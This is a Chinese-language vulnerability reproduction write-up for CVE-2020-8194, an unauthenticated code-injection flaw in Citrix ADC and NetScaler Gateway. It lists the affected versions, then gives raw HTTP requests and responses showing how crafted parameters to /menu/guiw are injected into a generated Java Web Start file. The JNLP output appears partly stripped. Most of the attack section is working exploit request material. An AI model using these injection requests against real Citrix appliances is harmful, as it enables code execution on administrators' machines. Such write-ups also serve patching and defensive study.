（CVE-2020-8194）Citrix_未授权访问导致的任意代码执行漏洞

# （CVE-2020-8194）Citrix 未授权访问导致的任意代码执行漏洞

================

一、漏洞简介
————

Citrix ADC和Citrix NetScaler
Gateway存在一个代码注入漏洞。未经身份验证的远程攻击者可以利用它来创建恶意文件，如果该恶意文件由管理网络上的受害者执行，则可以允许攻击者在该用户的上下文中执行任意代码。

二、漏洞影响
————

Citrix ADC and Citrix Gateway: \< 13.0-58.30 Citrix ADC and NetScaler Gateway: \< 12.1-57.18 Citrix ADC and NetScaler Gateway: \< 12.0-63.21 Citrix ADC and NetScaler Gateway: \< 11.1-64.14  NetScaler ADC and NetScaler Gateway: \< 10.5-70.18 Citrix SD-WAN WANOP: \< 11.1.1a Citrix SD-WAN WANOP: \< 11.0.3d Citrix SD-WAN WANOP: \< 10.2.7 Citrix Gateway Plug-in for Linux: \<  1.0.0.137 三、复现过程 ------------ > 通过URL来生成Java Web Start文件，此URL不需要身份验证：

GET /menu/guiw?nsbrand=1&protocol=2&id=3&nsvpx=4 HTTP/1.1
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: startupapp=st
Upgrade-Insecure-Requests: 1

此时Citrix会为用户返回一个生成的文件，且该文件会被允许连接到Citrix设备之中

HTTP/1.1 200 OK
Date: Tue, 21 Jan 2020 20:32:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2320
Connection: close
Content-Type: application/x-java-jnlp-file

Citrix Systems, Inc.

Configuration Utility – Web Start Client

-D
0
-WS
0
-codebase
2://citrix.local
-ns4
1
-ns104

如上所示，用户输入的代码，会直接反馈在输出中，那我们就可以尝试一下执行恶意代码

GET /menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org”>&id=HENKC&nsvpx=phpinfo HTTP/1.1
Host: www.0-sec.org

返回值

HTTP/1.1 200 OK
Date: Sun, 26 Jan 2020 12:52:01 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=10
X-XSS-Protection: 1; mode=block
Content-Length: 2398
Connection: close
Content-Type: application/x-java-jnlp-file

://www.0-sec.org” href=”/menu/guiw?nsbrand=HENKA&protocol=wiki.0-sec.org”>&id=HENKC&nsvpx=phpinfo”>

Citrix Systems, Inc.